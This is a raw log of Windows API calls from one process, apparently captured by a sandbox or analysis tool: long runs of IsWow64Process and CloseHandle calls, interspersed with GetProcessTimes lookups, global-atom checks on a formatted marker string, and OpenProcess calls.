	[0132.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.296] CloseHandle (hObject=0x2dc) returned 1
	[0132.296] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.296] CloseHandle (hObject=0x2dc) returned 1
	[0132.297] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.297] CloseHandle (hObject=0x2dc) returned 1
	[0132.297] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.297] CloseHandle (hObject=0x2dc) returned 1
	[0132.297] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.297] CloseHandle (hObject=0x2dc) returned 1
	[0132.297] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.297] CloseHandle (hObject=0x2dc) returned 1
	[0132.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.298] CloseHandle (hObject=0x2dc) returned 1
	[0132.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.298] CloseHandle (hObject=0x2dc) returned 1
	[0132.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.298] CloseHandle (hObject=0x2dc) returned 1
	[0132.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.298] CloseHandle (hObject=0x2dc) returned 1
	[0132.298] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.298] CloseHandle (hObject=0x2dc) returned 1
	[0132.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.299] CloseHandle (hObject=0x2dc) returned 1
	[0132.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.299] CloseHandle (hObject=0x2dc) returned 1
	[0132.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.299] CloseHandle (hObject=0x2dc) returned 1
	[0132.299] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.299] CloseHandle (hObject=0x2dc) returned 1
	[0132.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.300] CloseHandle (hObject=0x2dc) returned 1
	[0132.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.300] CloseHandle (hObject=0x2dc) returned 1
	[0132.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.300] CloseHandle (hObject=0x2dc) returned 1
	[0132.300] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.300] CloseHandle (hObject=0x2dc) returned 1
	[0132.301] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.301] CloseHandle (hObject=0x2dc) returned 1
	[0132.301] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.301] CloseHandle (hObject=0x2dc) returned 1
	[0132.301] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.301] CloseHandle (hObject=0x2dc) returned 1
	[0132.301] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.301] CloseHandle (hObject=0x2dc) returned 1
	[0132.302] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.302] CloseHandle (hObject=0x2dc) returned 1
	[0132.302] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.302] CloseHandle (hObject=0x2dc) returned 1
	[0132.302] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.302] CloseHandle (hObject=0x2dc) returned 1
	[0132.303] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.303] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.303] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.303] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0132.303] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.304] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.304] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.304] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.304] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.304] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.304] CloseHandle (hObject=0x2dc) returned 1
	[0132.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.304] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.304] CloseHandle (hObject=0x2dc) returned 1
	[0132.305] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.305] CloseHandle (hObject=0x2dc) returned 1
	[0132.305] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.305] CloseHandle (hObject=0x2dc) returned 1
	[0132.305] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.305] CloseHandle (hObject=0x2dc) returned 1
	[0132.305] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.305] CloseHandle (hObject=0x2dc) returned 1
	[0132.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.338] CloseHandle (hObject=0x2dc) returned 1
	[0132.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.338] CloseHandle (hObject=0x2dc) returned 1
	[0132.338] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.338] CloseHandle (hObject=0x2dc) returned 1
	[0132.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.339] CloseHandle (hObject=0x2dc) returned 1
	[0132.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.339] CloseHandle (hObject=0x2dc) returned 1
	[0132.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.339] CloseHandle (hObject=0x2dc) returned 1
	[0132.339] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.339] CloseHandle (hObject=0x2dc) returned 1
	[0132.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.340] CloseHandle (hObject=0x2dc) returned 1
	[0132.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.340] CloseHandle (hObject=0x2dc) returned 1
	[0132.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.340] CloseHandle (hObject=0x2dc) returned 1
	[0132.340] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.340] CloseHandle (hObject=0x2dc) returned 1
	[0132.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.341] CloseHandle (hObject=0x2dc) returned 1
	[0132.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.341] CloseHandle (hObject=0x2dc) returned 1
	[0132.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.341] CloseHandle (hObject=0x2dc) returned 1
	[0132.341] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.341] CloseHandle (hObject=0x2dc) returned 1
	[0132.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.342] CloseHandle (hObject=0x2dc) returned 1
	[0132.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.342] CloseHandle (hObject=0x2dc) returned 1
	[0132.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.342] CloseHandle (hObject=0x2dc) returned 1
	[0132.342] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.342] CloseHandle (hObject=0x2dc) returned 1
	[0132.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.343] CloseHandle (hObject=0x2dc) returned 1
	[0132.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.343] CloseHandle (hObject=0x2dc) returned 1
	[0132.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.343] CloseHandle (hObject=0x2dc) returned 1
	[0132.343] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.343] CloseHandle (hObject=0x2dc) returned 1
	[0132.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.344] CloseHandle (hObject=0x2dc) returned 1
	[0132.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.344] CloseHandle (hObject=0x2dc) returned 1
	[0132.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.344] CloseHandle (hObject=0x2dc) returned 1
	[0132.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.344] CloseHandle (hObject=0x2dc) returned 1
	[0132.344] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.344] CloseHandle (hObject=0x2dc) returned 1
	[0132.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.345] CloseHandle (hObject=0x2dc) returned 1
	[0132.345] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.345] CloseHandle (hObject=0x2dc) returned 1
	[0132.345] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.345] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.346] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.346] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0132.346] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.346] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.347] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.347] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.347] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.347] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.347] CloseHandle (hObject=0x2dc) returned 1
	[0132.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.347] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.347] CloseHandle (hObject=0x2dc) returned 1
	[0132.348] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.348] CloseHandle (hObject=0x2dc) returned 1
	[0132.348] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.348] CloseHandle (hObject=0x2dc) returned 1
	[0132.348] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.348] CloseHandle (hObject=0x2dc) returned 1
	[0132.348] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.348] CloseHandle (hObject=0x2dc) returned 1
	[0132.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.382] CloseHandle (hObject=0x2dc) returned 1
	[0132.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.382] CloseHandle (hObject=0x2dc) returned 1
	[0132.382] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.383] CloseHandle (hObject=0x2dc) returned 1
	[0132.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.383] CloseHandle (hObject=0x2dc) returned 1
	[0132.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.383] CloseHandle (hObject=0x2dc) returned 1
	[0132.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.383] CloseHandle (hObject=0x2dc) returned 1
	[0132.383] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.383] CloseHandle (hObject=0x2dc) returned 1
	[0132.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.384] CloseHandle (hObject=0x2dc) returned 1
	[0132.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.384] CloseHandle (hObject=0x2dc) returned 1
	[0132.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.384] CloseHandle (hObject=0x2dc) returned 1
	[0132.384] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.384] CloseHandle (hObject=0x2dc) returned 1
	[0132.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.385] CloseHandle (hObject=0x2dc) returned 1
	[0132.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.385] CloseHandle (hObject=0x2dc) returned 1
	[0132.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.385] CloseHandle (hObject=0x2dc) returned 1
	[0132.385] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.385] CloseHandle (hObject=0x2dc) returned 1
	[0132.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.386] CloseHandle (hObject=0x2dc) returned 1
	[0132.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.386] CloseHandle (hObject=0x2dc) returned 1
	[0132.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.386] CloseHandle (hObject=0x2dc) returned 1
	[0132.386] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.386] CloseHandle (hObject=0x2dc) returned 1
	[0132.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.387] CloseHandle (hObject=0x2dc) returned 1
	[0132.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.387] CloseHandle (hObject=0x2dc) returned 1
	[0132.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.387] CloseHandle (hObject=0x2dc) returned 1
	[0132.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.387] CloseHandle (hObject=0x2dc) returned 1
	[0132.387] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.388] CloseHandle (hObject=0x2dc) returned 1
	[0132.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.388] CloseHandle (hObject=0x2dc) returned 1
	[0132.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.388] CloseHandle (hObject=0x2dc) returned 1
	[0132.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.388] CloseHandle (hObject=0x2dc) returned 1
	[0132.388] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.388] CloseHandle (hObject=0x2dc) returned 1
	[0132.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.389] CloseHandle (hObject=0x2dc) returned 1
	[0132.389] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.389] CloseHandle (hObject=0x2dc) returned 1
	[0132.389] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.389] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.390] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.390] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.390] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.390] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.390] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.391] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.391] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.391] CloseHandle (hObject=0x2dc) returned 1
	[0132.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.391] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.391] CloseHandle (hObject=0x2dc) returned 1
	[0132.391] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.391] CloseHandle (hObject=0x2dc) returned 1
	[0132.391] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.391] CloseHandle (hObject=0x2dc) returned 1
	[0132.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.392] CloseHandle (hObject=0x2dc) returned 1
	[0132.392] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.392] CloseHandle (hObject=0x2dc) returned 1
	[0132.424] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.424] CloseHandle (hObject=0x2dc) returned 1
	[0132.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.425] CloseHandle (hObject=0x2dc) returned 1
	[0132.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.425] CloseHandle (hObject=0x2dc) returned 1
	[0132.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.425] CloseHandle (hObject=0x2dc) returned 1
	[0132.425] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.425] CloseHandle (hObject=0x2dc) returned 1
	[0132.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.426] CloseHandle (hObject=0x2dc) returned 1
	[0132.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.426] CloseHandle (hObject=0x2dc) returned 1
	[0132.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.426] CloseHandle (hObject=0x2dc) returned 1
	[0132.426] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.426] CloseHandle (hObject=0x2dc) returned 1
	[0132.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.427] CloseHandle (hObject=0x2dc) returned 1
	[0132.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.427] CloseHandle (hObject=0x2dc) returned 1
	[0132.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.427] CloseHandle (hObject=0x2dc) returned 1
	[0132.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.427] CloseHandle (hObject=0x2dc) returned 1
	[0132.427] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.428] CloseHandle (hObject=0x2dc) returned 1
	[0132.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.428] CloseHandle (hObject=0x2dc) returned 1
	[0132.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.428] CloseHandle (hObject=0x2dc) returned 1
	[0132.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.428] CloseHandle (hObject=0x2dc) returned 1
	[0132.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.428] CloseHandle (hObject=0x2dc) returned 1
	[0132.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.429] CloseHandle (hObject=0x2dc) returned 1
	[0132.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.429] CloseHandle (hObject=0x2dc) returned 1
	[0132.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.429] CloseHandle (hObject=0x2dc) returned 1
	[0132.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.429] CloseHandle (hObject=0x2dc) returned 1
	[0132.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.430] CloseHandle (hObject=0x2dc) returned 1
	[0132.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.430] CloseHandle (hObject=0x2dc) returned 1
	[0132.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.430] CloseHandle (hObject=0x2dc) returned 1
	[0132.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.430] CloseHandle (hObject=0x2dc) returned 1
	[0132.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.431] CloseHandle (hObject=0x2dc) returned 1
	[0132.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.431] CloseHandle (hObject=0x2dc) returned 1
	[0132.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.431] CloseHandle (hObject=0x2dc) returned 1
	[0132.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.431] CloseHandle (hObject=0x2dc) returned 1
	[0132.432] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.432] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.432] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.432] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.432] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.433] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.433] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.433] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.433] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.433] CloseHandle (hObject=0x2dc) returned 1
	[0132.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.433] CloseHandle (hObject=0x2dc) returned 1
	[0132.434] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.434] CloseHandle (hObject=0x2dc) returned 1
